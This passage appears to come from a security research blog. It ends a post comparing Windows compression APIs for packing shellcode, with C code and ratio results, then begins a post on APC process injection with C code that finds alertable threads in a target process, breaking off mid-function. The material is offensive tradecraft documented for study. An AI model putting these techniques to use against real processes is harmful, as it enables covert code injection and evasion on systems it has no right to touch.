//   inlen    total size of inbuf in bytes (header included)
//   outfile  handle opened for writing
//   returns  number of decompressed bytes written, or 0 on any failure
DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    ULONG                            wspace = 0, fspace = 0;
    ULONG                            explen, outlen = 0;
    DWORD                            len = 0, result = 0;
    NTSTATUS                         nts;
    PVOID                            ws, outbuf;
    HMODULE                          m;
    RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
    RtlDecompressBufferEx_t          RtlDecompressBufferEx;

    // The input must hold the length header plus at least one data byte;
    // otherwise inlen - sizeof(DWORD) below would wrap around.
    if(inbuf == NULL || inlen <= sizeof(DWORD)) return 0;
      
    // the module name is a narrow string, so call the ANSI variant explicitly
    m = GetModuleHandleA("ntdll");
    RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
    RtlDecompressBufferEx          = (RtlDecompressBufferEx_t)GetProcAddress(m, "RtlDecompressBufferEx");
        
    if(RtlGetCompressionWorkSpaceSize == NULL || RtlDecompressBufferEx == NULL) {
      printf("Unable to resolve RTL API\n");
      return 0;
    }
        
    // 1. obtain the size of workspace
    nts = RtlGetCompressionWorkSpaceSize(
      engine | COMPRESSION_ENGINE_MAXIMUM, 
      &wspace, &fspace);
          
    if(nts == 0) {
      // 2. allocate memory for workspace
      ws = malloc(wspace); 
      if(ws != NULL) {
        // 3. allocate memory for output, sized from the stored header
        explen = *(DWORD*)inbuf;
        outbuf = (explen != 0) ? malloc(explen) : NULL;
        
        if(outbuf != NULL) {
          // 4. decompress data
          nts = RtlDecompressBufferEx(
            engine | COMPRESSION_ENGINE_MAXIMUM, 
            outbuf, explen, 
            (PBYTE)inbuf + sizeof(DWORD), inlen - sizeof(DWORD), 
            &outlen, ws); 
              
          if(nts == 0) {
            // 5. write decompressed data to file
            if(WriteFile(outfile, outbuf, outlen, &len, 0)) {
              result = outlen;
            }
          } else {
            printf("RtlDecompressBufferEx failed with %08lx\n", nts);
          }
          // 6. free output buffer
          free(outbuf);
        } else {
          printf("malloc() failed\n");
        }
        // 7. free workspace
        free(ws);
      }
    }
    return result;
}

3. Windows Compression API

Despite being well documented and offering better compression ratios than RtlCompressBuffer, it’s unusual to see these API used at all. Four engines are supported: MSZIP, Xpress, Xpress Huffman and LZMS. To demonstrate using these API, see xpress.c

Compression

// Compress `inbuf` with the Windows Compression API and write the result to
// `outfile`.
//
//   engine   algorithm identifier passed to CreateCompressor
//   inbuf    data to compress
//   inlen    size of inbuf in bytes
//   outfile  handle opened for writing
//   returns  non-zero only if the data was compressed AND written;
//            zero on any failure (each failure is reported via xstrerror)
DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    COMPRESSOR_HANDLE ch = NULL;
    BOOL              r;
    SIZE_T            outlen = 0, len = 0;
    LPVOID            outbuf;
    DWORD             wr = 0;
    
    // Create a compressor
    r = CreateCompressor(engine, NULL, &ch);
    
    if(r) {    
      // Query compressed buffer size. With no output buffer the call is
      // expected to fail with ERROR_INSUFFICIENT_BUFFER; the last-error value
      // is only meaningful when the call actually failed.
      r = Compress(ch, inbuf, inlen, NULL, 0, &len);      
      if(!r && GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
        // allocate memory for compressed data
        outbuf = malloc(len);
        if(outbuf != NULL) {
          // Compress data and write data to outbuf.
          r = Compress(ch, inbuf, inlen, outbuf, len, &outlen);
          // if compressed ok, write to file
          if(r) {
            r = WriteFile(outfile, outbuf, (DWORD)outlen, &wr, NULL);
            if(!r) xstrerror("WriteFile()");
          } else xstrerror("Compress()");
          free(outbuf);
        } else {
          r = FALSE;
          xstrerror("malloc()");
        }
      } else {
        // the query either succeeded without producing output or failed for
        // another reason; in both cases nothing was written
        r = FALSE;
        xstrerror("Compress()");
      }
      CloseCompressor(ch);
    } else xstrerror("CreateCompressor()");
    return r;
}

Decompression

// Decompress `inbuf` with the Windows Compression API and write the result
// to `outfile`.
//
//   engine   algorithm identifier passed to CreateDecompressor
//   inbuf    compressed data
//   inlen    size of inbuf in bytes
//   outfile  handle opened for writing
//   returns  non-zero only if the data was decompressed AND written;
//            zero on any failure (each failure is reported via xstrerror)
DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    DECOMPRESSOR_HANDLE dh = NULL;
    BOOL                r;
    SIZE_T              outlen = 0, len = 0;
    LPVOID              outbuf;
    DWORD               wr = 0;
    
    // Create a decompressor
    r = CreateDecompressor(engine, NULL, &dh);
    
    if(r) {    
      // Query Decompressed buffer size. With no output buffer the call is
      // expected to fail with ERROR_INSUFFICIENT_BUFFER; the last-error value
      // is only meaningful when the call actually failed.
      r = Decompress(dh, inbuf, inlen, NULL, 0, &len);      
      if(!r && GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
        // allocate memory for decompressed data
        outbuf = malloc(len);
        if(outbuf != NULL) {
          // Decompress data and write data to outbuf.
          r = Decompress(dh, inbuf, inlen, outbuf, len, &outlen);
          // if decompressed ok, write to file
          if(r) {
            r = WriteFile(outfile, outbuf, (DWORD)outlen, &wr, NULL);
            if(!r) xstrerror("WriteFile()");
          } else xstrerror("Decompress()");
          free(outbuf);
        } else {
          r = FALSE;
          xstrerror("malloc()");
        }
      } else {
        // the query either succeeded without producing output or failed for
        // another reason; in both cases nothing was written
        r = FALSE;
        xstrerror("Decompress()");
      }
      CloseDecompressor(dh);
    } else xstrerror("CreateDecompressor()");
    return r;
}

4. Windows Packaging API

If you’re a developer that wants to sell a Windows application to customers on the Microsoft Store, you must submit a package that uses the Open Packaging Conventions (OPC) format. Visual Studio automates building packages (.msix or .appx) and bundles (.msixbundle or .appxbundle). There’s also a well documented interface (IAppxFactory) that allows building them manually. While not intended to be used specifically for compression, there’s no reason why you can’t. An SDK sample to extract the contents of packages uses SHCreateStreamOnFileEx to read the package from disk. However, you can also use SHCreateMemStream and decompress a package entirely in memory.

5. Windows Imaging API (WIM)

These encode and decode .wim files on disk. WIMCreateFile internally calls CreateFile to return a file handle to an archive that’s then used with WIMCaptureImage to compress and add files to the archive. From what I can tell, there’s no way to work with .wim files in memory using these API.

For Linux, the Windows Imaging (WIM) library supports Xpress, LZX and LZMS algorithms. libmspack and this repo provide good information on the various compression algorithms supported by Windows.

6. Direct3D HLSL Compiler

Believe it or not, the best compression ratio on Windows is provided by the Direct3D API. Internally, they use the DXT/Block Compression (BC) algorithms, which are designed specifically for textures/images. The algorithms provide higher quality compression rates than anything else available on Windows. The compression ratio was 60% for a 1MB EXE file and using the API is very easy. The following example in C uses D3DCompressShaders and D3DDecompressShaders. While untested, I believe OpenGL API could likely be used in a similar way.

Compression

#pragma comment(lib, "D3DCompiler.lib")
#include <d3dcompiler.h>
uint32_t d3d_compress(const void *inbuf, uint32_t inlen) {
    
    D3D_SHADER_DATA dsa;
    HRESULT         hr;
    ID3DBlob        *blob;
    SIZE_T          outlen = 0;
    LPVOID          outbuf;
    HANDLE          file;
    DWORD           len;
    
    file = CreateFile("compressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file == INVALID_HANDLE_VALUE) return 0;
    
    dsa.pBytecode      = inbuf;
    dsa.BytecodeLength = inlen;
    
    // compress data
    hr = D3DCompressShaders(1, &dsa, D3D_COMPRESS_SHADER_KEEP_ALL_PARTS, &blob);
    if(hr == S_OK) {
      // write to file
      outlen = blob->lpVtbl->GetBufferSize(blob);
      outbuf = blob->lpVtbl->GetBufferPointer(blob);
      
      WriteFile(file, outbuf, outlen, &len, 0);
      blob->lpVtbl->Release(blob);
    }
    CloseHandle(file);
    return outlen;
}

Decompression

uint32_t d3d_decompress(const void *inbuf, uint32_t inlen) {
    D3D_SHADER_DATA dsa;
    HRESULT         hr;
    ID3DBlob        *blob;
    SIZE_T          outlen = 0;
    LPVOID          outbuf;
    HANDLE          file;
    DWORD           len;
    
    // create file to save decompressed data to
    file = CreateFile("decompressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file == INVALID_HANDLE_VALUE) return 0;
    
    dsa.pBytecode      = inbuf;
    dsa.BytecodeLength = inlen;
    
    // decompress buffer
    hr = D3DDecompressShaders(inbuf, inlen, 1, 0, 0, 0, &blob, NULL);
    if(hr == S_OK) {
      // write to file
      outlen = blob->lpVtbl->GetBufferSize(blob);
      outbuf = blob->lpVtbl->GetBufferPointer(blob);
      
      WriteFile(file, outbuf, outlen, &len, 0);
      blob->lpVtbl->Release(blob);
    }
    CloseHandle(file);
    return outlen;    
}

The main problem with dynamically resolving these API is knowing what version is installed. The file name on my Windows 10 system is “D3DCompiler_47.dll”. It will likely be different on legacy systems.

7. Windows-internal libarchive library

Since the release of Windows 10 build 17063, the tape archiving tool ‘bsdtar’ is available and uses a stripped down version of the open source Multi-format archive and compression library to create and extract compressed files both in memory and on disk. The version found on Windows supports the bzip2, compress and gzip formats. Although bsdtar lists support for xz, lzma and lzip, they appear to be unsupported, at least on my system.

8. LibreSSL Cryptography Library

Windows 10 Fall Creators Update and Windows Server 1709 include support for an OpenSSH client and server. The crypto library used by this port appears to have been compiled from the LibreSSL project, and if available can be found in C:\Windows\System32\libcrypto.dll. As some of you know, Transport Layer Security (TLS) supports compression prior to encryption. LibreSSL supports the ZLib and RLE methods, so it’s entirely possible to use COMP_compress_block and COMP_expand_block to compress and decompress raw data in memory.

9. Windows.Storage.Compression

This namespace located in Windows.Storage.Compress.dll internally uses Windows Compression API. CreateCompressor is invoked with the COMPRESS_RAW flag set. It also invokes SetCompressorInformation with COMPRESS_INFORMATION_CLASS_BLOCK_SIZE flag if the user specifies one in the Compressor method.

10. Windows Undocumented API

DLLs on Windows use the DEFLATE algorithm extensively to support various audio, video, image encoders/decoders and file archives. Normally, the deflate routines are used internally and can’t be resolved dynamically via GetProcAddress. However, between at least Windows 7 and 10 is a DLL called PresentationNative_v0300.dll that can be found in the C:\Windows\System32 directory. (There may also be PresentationNative_v0400.dll, but I haven’t investigated this thoroughly enough.) Four public symbols grabbed my attention, which are ums_deflate_init, ums_deflate, ums_inflate_init and ums_inflate. For a PoC demonstrating how to use them, see winflate.c

Compression

The following code uses zlib.h to compress a buffer and write to file.

/**
 * Deflate a buffer using the ums_deflate* exports of
 * PresentationNative_v0300.dll and write the result to a file.
 *
 * File layout: the original length as a DWORD, followed by the
 * compressed stream.
 *
 * inbuf   : data to compress
 * inlen   : size of inbuf in bytes
 * outfile : handle opened for writing
 *
 * Always returns 0; failures are reported on stdout.
 */
DWORD CompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    LPVOID             outbuf;
    DWORD              wr, produced;
    HMODULE            m;
    z_stream           ds;
    ums_deflate_t      ums_deflate;
    ums_deflate_init_t ums_deflate_init;
    int                err;
    
    m = LoadLibrary("PresentationNative_v0300.dll");
    if(m == NULL) {
      printf("  [ unable to resolve deflate API.\n");
      return 0;
    }
    ums_deflate_init = (ums_deflate_init_t)GetProcAddress(m, "ums_deflate_init");
    ums_deflate      = (ums_deflate_t)GetProcAddress(m, "ums_deflate");
    
    if(ums_deflate_init == NULL || ums_deflate == NULL) {
      printf("  [ unable to resolve deflate API.\n");
      return 0;
    }
    // NOTE(review): the module is intentionally left loaded; no matching
    // "end" export is used here to release the stream state - confirm
    // before adding FreeLibrary.
    
    // allocate memory for compressed data
    outbuf = malloc(inlen);
    if(outbuf != NULL) {
      // Compress data and write data to outbuf.
      ds.zalloc    = Z_NULL;
      ds.zfree     = Z_NULL;
      ds.opaque    = Z_NULL;
      ds.avail_in  = (uInt)inlen;       // size of input
      ds.next_in   = (Bytef *)inbuf;    // input buffer
      ds.avail_out = (uInt)inlen;       // size of output buffer
      ds.next_out  = (Bytef *)outbuf;   // output buffer
      
      if(ums_deflate_init(&ds, Z_BEST_COMPRESSION, "1", sizeof(ds)) == Z_OK) {
        if((err = ums_deflate(&ds, Z_FINISH)) == Z_STREAM_END) {
          // avail_out is the space still FREE in outbuf, so the number
          // of compressed bytes is the capacity minus what remains
          produced = inlen - (DWORD)ds.avail_out;
          
          // write the original length first
          WriteFile(outfile, &inlen, sizeof(DWORD), &wr, NULL);
          // then the data
          WriteFile(outfile, outbuf, produced, &wr, NULL);
          FlushFileBuffers(outfile);
        } else {
          printf("  [ ums_deflate() : %x\n", err);
        }
      } else {
        printf("  [ ums_deflate_init()\n");
      }
      free(outbuf);
    }
    return 0;
}

Decompression

Inflating/decompressing the data is based on an example using zlib.

/**
 * Inflate a buffer using the ums_inflate* exports of
 * PresentationNative_v0300.dll and write the result to a file.
 *
 * Expected input layout: the original length as a DWORD, followed by
 * the compressed stream.
 *
 * inbuf   : header + compressed data
 * inlen   : size of inbuf in bytes
 * outfile : handle opened for writing
 *
 * Always returns 0; failures are reported on stdout.
 */
DWORD DecompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    SIZE_T             outlen, cap;
    LPVOID             outbuf;
    DWORD              wr, produced;
    HMODULE            m;
    z_stream           ds;
    ums_inflate_t      ums_inflate;
    ums_inflate_init_t ums_inflate_init;
    
    m = LoadLibrary("PresentationNative_v0300.dll");
    if(m == NULL) {
      printf("  [ unable to resolve inflate API.\n");
      return 0;
    }
    ums_inflate_init = (ums_inflate_init_t)GetProcAddress(m, "ums_inflate_init");
    ums_inflate      = (ums_inflate_t)GetProcAddress(m, "ums_inflate");
    
    if(ums_inflate_init == NULL || ums_inflate == NULL) {
      printf("  [ unable to resolve inflate API.\n");
      return 0;
    }
    
    // the buffer must hold the DWORD length header plus at least one byte
    if(inbuf == NULL || inlen <= sizeof(DWORD)) {
      printf("  [ invalid input buffer.\n");
      return 0;
    }
    
    // allocate memory for decompressed data (twice the recorded length)
    outlen = *(DWORD*)inbuf;
    cap    = outlen * 2;
    
    // avail_out is a 32-bit field; refuse sizes it cannot represent
    if(cap == 0 || cap > MAXDWORD) {
      printf("  [ invalid input buffer.\n");
      return 0;
    }
    outbuf = malloc(cap);
    
    if(outbuf != NULL) {
      // decompress data and write data to outbuf.
      ds.zalloc    = Z_NULL;
      ds.zfree     = Z_NULL;
      ds.opaque    = Z_NULL;
      ds.avail_in  = (uInt)(inlen - sizeof(DWORD)); // input minus the header
      ds.next_in   = (Bytef*)inbuf + sizeof(DWORD); // skip the header
      ds.avail_out = (uInt)cap;                     // size of output buffer
      ds.next_out  = (Bytef*)outbuf;                // output buffer
      
      printf("  [ initializing inflate...\n");
      if(ums_inflate_init(&ds, "1", sizeof(ds)) == Z_OK) {
        printf("  [ inflating...\n");
        if(ums_inflate(&ds, Z_FINISH) == Z_STREAM_END) {
          // avail_out is the space still FREE in outbuf, so the number
          // of decompressed bytes is the capacity minus what remains
          produced = (DWORD)(cap - ds.avail_out);
          WriteFile(outfile, outbuf, produced, &wr, NULL);
          FlushFileBuffers(outfile);
        } else {
          printf("  [ ums_inflate()\n");
        }
      } else {
        printf("  [ ums_inflate_init()\n");
      }
      free(outbuf);
    } else {
      printf("  [ malloc()\n");
    }
    return 0;
}

11. Summary/Results

That sums up the algorithms I think are suitable for a shellcode. For the moment, UCL and apultra seem to provide the best solution. Using Windows API is a good option. They are also susceptible to monitoring and may not be portable. One area I didn’t cover due to time is Media Foundation API. It may be possible to use audio, video and image encoders to compress raw data and the decoders to decompress. Worth researching?

Library / API Algorithm / Engine Compression Ratio
RtlCompressBuffer LZNT1 39%
RtlCompressBuffer Xpress 47%
RtlCompressBuffer Xpress Huffman 53%
Compress MSZIP 55%
Compress Xpress 40%
Compress Xpress Huffman 48%
Compress LZMS 58%
D3DCompressShaders DXT/BC 60%
aPLib N/A 45%
UCL N/A 42%
Undocumented API DEFLATE 46%

Windows Process Injection: Asynchronous Procedure Call (APC)

By: odzhan
27 August 2019 at 18:00

Introduction

An early example of APC injection can be found in a 2005 paper by the late Barnaby Jack called Remote Windows Kernel Exploitation – Step into the Ring 0. Until now, these posts have focused on relatively new, lesser-known injection techniques. A factor in not covering APC injection before is the lack of a single user-mode API to identify alertable threads. Many have asked “how to identify an alertable thread” and were given an answer that didn’t work or were told it’s not possible. This post will examine two methods that both use a combination of user-mode API to identify them. The first was described in 2016 and the second was suggested earlier this month at Blackhat and Defcon.

Alertable Threads

A number of Windows API and the underlying system calls support asynchronous operations and specifically I/O completion routines. A boolean parameter tells the kernel a calling thread should be alertable, so I/O completion routines for overlapped operations can still run in the background while waiting for some other event to become signalled. Completion routines or callback functions are placed in the APC queue and executed by the kernel via NTDLL!KiUserApcDispatcher. The following Win32 API can set threads to alertable: SleepEx, WaitForSingleObjectEx, WaitForMultipleObjectsEx, SignalObjectAndWait and MsgWaitForMultipleObjectsEx.

A few others rarely mentioned involve working with files or named pipes that might be read or written to using overlapped operations. e.g ReadFile.

Unfortunately, there’s no single user-mode API to determine if a thread is alertable. From the kernel, the KTHREAD structure has an Alertable bit, but from user-mode there’s nothing similar, at least not that I’m aware of.

Method 1

First described and used by Tal Liberman in a technique he invented called AtomBombing.

…create an event for each thread in the target process, then ask each thread to set its corresponding event. … wait on the event handles, until one is triggered. The thread whose corresponding event was triggered is an alertable thread.

Based on this description, we take the following steps:

  1. Enumerate threads in a target process using Thread32First and Thread32Next. OpenThread and save the handle to an array not exceeding MAXIMUM_WAIT_OBJECTS.
  2. CreateEvent for each thread and DuplicateHandle for the target process.
  3. QueueUserAPC for each thread that will execute SetEvent on the handle duplicated in step 2.
  4. WaitForMultipleObjects until one of the event handles becomes signalled.
  5. The first event signalled is from an alertable thread.

MAXIMUM_WAIT_OBJECTS is defined as 64 which might seem like a limitation, but how likely is it for processes to have more than 64 threads and not one alertable?

/**
 * Find an alertable thread in a target process by queueing an APC to
 * each thread that signals a per-thread event, then waiting to see
 * which event fires first.
 *
 * hp  : handle to the target process; it is used as the target (and
 *       later the source) of DuplicateHandle, so it needs
 *       PROCESS_DUP_HANDLE access
 * pid : process id of the target
 *
 * Returns an open handle to the first thread that ran the APC within
 * one second (the caller must close it), or NULL if none was found.
 * At most MAXIMUM_WAIT_OBJECTS threads are examined.
 */
HANDLE find_alertable_thread1(HANDLE hp, DWORD pid) {
    DWORD         i, w, cnt = 0, n = 0;
    HANDLE        ss, ht, le, re, h = NULL, 
      hl[MAXIMUM_WAIT_OBJECTS],   // thread handles
      sh[MAXIMUM_WAIT_OBJECTS],   // local event handles
      th[MAXIMUM_WAIT_OBJECTS];   // event handle values valid in target
    THREADENTRY32 te;
    HMODULE       m;
    LPVOID        f;
    
    // 1. Enumerate threads in target process
    ss = CreateToolhelp32Snapshot(
      TH32CS_SNAPTHREAD, 0);
      
    if(ss == INVALID_HANDLE_VALUE) return NULL;

    te.dwSize = sizeof(THREADENTRY32);
    
    if(Thread32First(ss, &te)) {
      do {
        // if not our target process, skip it
        if(te.th32OwnerProcessID != pid) continue;
        // if we can't open thread, skip it
        ht = OpenThread(
          THREAD_ALL_ACCESS, 
          FALSE, 
          te.th32ThreadID);
          
        if(ht == NULL) continue;
        // otherwise, add to list
        hl[cnt++] = ht;
        // if we've reached MAXIMUM_WAIT_OBJECTS. break
        if(cnt == MAXIMUM_WAIT_OBJECTS) break;
      } while(Thread32Next(ss, &te));
    }
    CloseHandle(ss);

    // Resolve address of SetEvent
    m  = GetModuleHandle(L"kernel32.dll");
    f  = (m != NULL) ? (LPVOID)GetProcAddress(m, "SetEvent") : NULL;
    
    // Keep only the threads for which every step succeeded, compacting
    // the three parallel arrays so the wait below sees valid handles only.
    for(i=0; i<cnt; i++) {
      // 2. create event and duplicate in target process
      le = (f != NULL) ? CreateEvent(NULL, FALSE, FALSE, NULL) : NULL;
      re = NULL;
      
      if(le != NULL && DuplicateHandle(
        GetCurrentProcess(),  // source process
        le,                   // source handle to duplicate
        hp,                   // target process
        &re,                  // target handle
        0, 
        FALSE, 
        DUPLICATE_SAME_ACCESS))
      {
        // 3. Queue APC for thread passing target event handle
        if(QueueUserAPC((PAPCFUNC)f, hl[i], (ULONG_PTR)re)) {
          hl[n] = hl[i];
          sh[n] = le;
          th[n] = re;
          n++;
          continue;
        }
        // APC not queued: close the handle we created in the target
        DuplicateHandle(hp, re, NULL, NULL, 0, FALSE, DUPLICATE_CLOSE_SOURCE);
      }
      if(le != NULL) CloseHandle(le);
      CloseHandle(hl[i]);
    }
    cnt = n;

    // 4. Wait for event to become signalled
    if(cnt != 0) {
      w = WaitForMultipleObjects(cnt, sh, FALSE, 1000);
      // only WAIT_OBJECT_0..WAIT_OBJECT_0+cnt-1 identify an event;
      // WAIT_TIMEOUT and WAIT_FAILED must not be used as an index
      if(w < WAIT_OBJECT_0 + cnt) {
        // 5. save thread handle
        h = hl[w - WAIT_OBJECT_0];
      }
    }
    
    // 6. Close source + target handles
    for(i=0; i<cnt; i++) {
      CloseHandle(sh[i]);
      // th[i] is only meaningful inside the target process, so it is
      // closed there rather than with a local CloseHandle.
      // NOTE(review): APCs still pending on non-alertable threads will
      // later call SetEvent on a closed handle value.
      DuplicateHandle(hp, th[i], NULL, NULL, 0, FALSE, DUPLICATE_CLOSE_SOURCE);
      if(hl[i] != h) CloseHandle(hl[i]);
    }
    return h;
}

Method 2

At Blackhat and Defcon 2019, Itzik Kotler and Amit Klein presented Process Injection Techniques – Gotta Catch Them All. They suggested alertable threads can be detected by simply reading the context of a remote thread and examining the control and integer registers. There’s currently no code in their pinjectra tool to perform this, so I decided to investigate how it might be implemented in practice.

If you look at the disassembly of KERNELBASE!SleepEx on Windows 10 (shown in figure 1), you can see it invokes the NT system call, NTDLL!ZwDelayExecution.

Figure 1. Disassembly of SleepEx on Windows 10.

The system call wrapper (shown in figure 2) executes a syscall instruction which transfers control from user-mode to kernel-mode. If we read the context of a thread that called KERNELBASE!SleepEx, the program counter (Rip on AMD64) should point to NTDLL!ZwDelayExecution + 0x14 which is the address of the RETN opcode.

Figure 2. Disassembly of NTDLL!ZwDelayExecution on Windows 10.

This address can be used to determine if a thread has called KERNELBASE!SleepEx. To calculate it, we have two options. Add a hardcoded offset to the address returned by GetProcAddress for NTDLL!ZwDelayExecution or read the program counter after calling KERNELBASE!SleepEx from our own artificial thread.

For the second option, a simple application was written to run a thread and call asynchronous APIs with alertable parameter set to TRUE. In between each invocation, GetThreadContext is used to read the program counter (Rip on AMD64) which will hold the return address after the system call has completed. This address can then be used in the first step of detection. Figure 3 shows output of this.

Figure 3. Win32 API and NT System Call Wrappers.

The following table matches Win32 APIs with NT system call wrappers. The parameters are included for reference.

Win32 API NT System Call
SleepEx ZwDelayExecution(BOOLEAN Alertable, PLARGE_INTEGER DelayInterval);
WaitForSingleObjectEx
GetOverlappedResultEx
ZwWaitForSingleObject(HANDLE Handle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
WaitForMultipleObjectsEx
WSAWaitForMultipleEvents
NtWaitForMultipleObjects(ULONG ObjectCount, PHANDLE ObjectsArray, OBJECT_WAIT_TYPE WaitType, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
SignalObjectAndWait NtSignalAndWaitForSingleObject(HANDLE SignalHandle, HANDLE WaitHandle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
MsgWaitForMultipleObjectsEx NtUserMsgWaitForMultipleObjectsEx(ULONG ObjectCount, PHANDLE ObjectsArray, DWORD Timeout, DWORD WakeMask, DWORD Flags);
GetQueuedCompletionStatusEx NtRemoveIoCompletionEx(HANDLE Port, FILE_IO_COMPLETION_INFORMATION *Info, ULONG Count, ULONG *Written, LARGE_INTEGER *Timeout, BOOLEAN Alertable);

The second step of detection involves reading the register that holds the Alertable parameter. NT system calls use the Microsoft fastcall convention. The first four arguments are placed in RCX, RDX, R8 and R9 with the remainder stored on the stack. Figure 4 shows the Win64 stack layout. The first index of the stack register (Rsp) will contain the return address of caller, the next four will be the shadow, spill or home space to optionally save RCX, RDX, R8 and R9. The fifth, sixth and subsequent arguments to the system call appear after this.

Figure 4. Win64 Stack Layout.

Based on the prototypes shown in the above table, to determine if a thread is alertable, verify the register holding the Alertable parameter is TRUE or FALSE. The following code performs this.

/**
 * Decide whether a thread is blocked in one of six alertable system
 * calls with its Alertable argument set.
 *
 * hp   : handle to the process owning the thread (read access needed
 *        for the two stack-based checks)
 * ht   : handle to the thread to inspect
 * addr : six program-counter values, in this order:
 *        ZwDelayExecution, NtWaitForSingleObject,
 *        NtWaitForMultipleObjects, NtSignalAndWaitForSingleObject,
 *        NtUserMsgWaitForMultipleObjectsEx, NtRemoveIoCompletionEx
 *
 * Returns TRUE if the thread's Rip matches an entry and the matching
 * Alertable value is set; FALSE otherwise, including when the context
 * or the stack cannot be read.
 */
BOOL IsAlertable(HANDLE hp, HANDLE ht, LPVOID addr[6]) {
    CONTEXT   c;
    BOOL      alertable = FALSE;
    DWORD     i;
    ULONG_PTR p[8];
    SIZE_T    rd;
    
    // read the context; without it there is nothing valid to compare
    c.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;
    if(!GetThreadContext(ht, &c)) return FALSE;
    
    // for each alertable function
    for(i=0; i<6 && !alertable; i++) {
      // compare address with program counter
      if((LPVOID)c.Rip != addr[i]) continue;
      
      switch(i) {
        // ZwDelayExecution: Alertable is the 1st argument
        case 0 :
          alertable = (c.Rcx & TRUE) != 0;
          break;
        // NtWaitForSingleObject: Alertable is the 2nd argument
        case 1 :
          alertable = (c.Rdx & TRUE) != 0;
          break;
        // NtWaitForMultipleObjects: value is taken from Rsi
        case 2 :
          alertable = (c.Rsi & TRUE) != 0;
          break;
        // NtSignalAndWaitForSingleObject: value is taken from Rsi
        case 3 :
          alertable = (c.Rsi & TRUE) != 0;
          break;
        // NtUserMsgWaitForMultipleObjectsEx: Flags is the 5th argument,
        // read from the stack slot at index 5
        case 4 :
          if(ReadProcessMemory(hp, (LPVOID)c.Rsp, p, sizeof(p), &rd)) {
            alertable = (p[5] & MWMO_ALERTABLE) != 0;
          }
          break;
        // NtRemoveIoCompletionEx: Alertable is the 6th argument,
        // read from the stack slot at index 6
        case 5 :
          if(ReadProcessMemory(hp, (LPVOID)c.Rsp, p, sizeof(p), &rd)) {
            alertable = (p[6] & TRUE) != 0;
          }
          break;
      }
    }
    return alertable;
}

You might be asking why Rsi is checked for two of the calls despite not being used for a parameter by the Microsoft fastcall convention. This is a callee saved non-volatile register that should be preserved by any function that uses it. RCX, RDX, R8 and R9 are volatile registers and don’t need to be preserved. It just so happens the kernel overwrites R9 for NtWaitForMultipleObjects (shown in figure 5) and R8 for NtSignalAndWaitForSingleObject (shown in figure 6) hence the reason for checking Rsi instead. BOOLEAN is defined as an 8-bit type, so a mask of the register is performed before comparing with TRUE or FALSE.

Figure 5. Rsi used for Alertable Parameter to NtWaitForMultipleObjects.

Figure 6. Rsi used for Alertable parameter to NtSignalAndWaitForSingleObject.

The following code can support adding an offset or reading the thread context before enumerating threads.

// thread to run alertable functions
// Thread that enters each alertable function in turn so that another
// thread can sample its program counter while it is blocked.
//
// lpParameter : pointer to an array of two event handles
//
// The order of the calls matters: it must match the order in which the
// sampled addresses are interpreted by the caller.
// Always returns 0.
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    HANDLE           *evt = (HANDLE*)lpParameter;
    HANDLE           port;
    OVERLAPPED_ENTRY lap;
    DWORD            n;
    
    SleepEx(INFINITE, TRUE);
    
    WaitForSingleObjectEx(evt[0], INFINITE, TRUE);
    
    WaitForMultipleObjectsEx(2, evt, FALSE, INFINITE, TRUE);
    
    SignalObjectAndWait(evt[1], evt[0], INFINITE, TRUE);
    
    // clear both events before the next wait
    ResetEvent(evt[0]);
    ResetEvent(evt[1]);
    
    MsgWaitForMultipleObjectsEx(2, evt, 
      INFINITE, QS_RAWINPUT, MWMO_ALERTABLE);
      
    // a fresh completion port with nothing queued, used only to block on
    port = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
    if(port != NULL) {
      GetQueuedCompletionStatusEx(port, &lap, 1, &n, INFINITE, TRUE);
      CloseHandle(port);
    }
    
    return 0;
}

/**
 * Find an alertable thread in a target process by comparing each
 * thread's program counter and registers against six known alertable
 * system calls (see IsAlertable).
 *
 * The six reference addresses are obtained either by adding a fixed
 * offset to each system call wrapper (USE_OFFSET) or by sampling a
 * local helper thread that enters each function in turn.
 *
 * hp  : handle to the target process
 * pid : process id of the target
 *
 * Returns an open handle to the first matching thread (the caller must
 * close it), or NULL if none was found or setup failed.
 */
HANDLE find_alertable_thread2(HANDLE hp, DWORD pid) {
    HANDLE        ss, ht, h = NULL;
    LPVOID        f[6];
    THREADENTRY32 te;
    DWORD         i;
    HMODULE       m;
#ifdef USE_OFFSET
    FARPROC       fn;
    // using the offset requires less code but it may
    // not work across all systems.
    char *api[6]={
      "ZwDelayExecution", 
      "ZwWaitForSingleObject",
      "NtWaitForMultipleObjects",
      "NtSignalAndWaitForSingleObject",
      "NtUserMsgWaitForMultipleObjectsEx",
      "NtRemoveIoCompletionEx"};
#else
    HANDLE        evt[2];
    LPVOID        sevt;
    CONTEXT       c;
#endif

#ifdef USE_OFFSET
    // 1. Resolve address of alertable functions
    for(i=0; i<6; i++) {
      m  = GetModuleHandle(i == 4 ? L"win32u" : L"ntdll");
      fn = (m != NULL) ? GetProcAddress(m, api[i]) : NULL;
      // 0x14 is the offset added to the wrapper's entry point; an
      // unresolved export is stored as NULL rather than NULL + 0x14
      f[i] = (fn != NULL) ? (LPVOID)((LPBYTE)fn + 0x14) : NULL;
    }
#else
    // resolve address of SetEvent
    m      = GetModuleHandle(L"kernel32.dll");
    sevt   = (m != NULL) ? (LPVOID)GetProcAddress(m, "SetEvent") : NULL;
    if(sevt == NULL) return NULL;
    
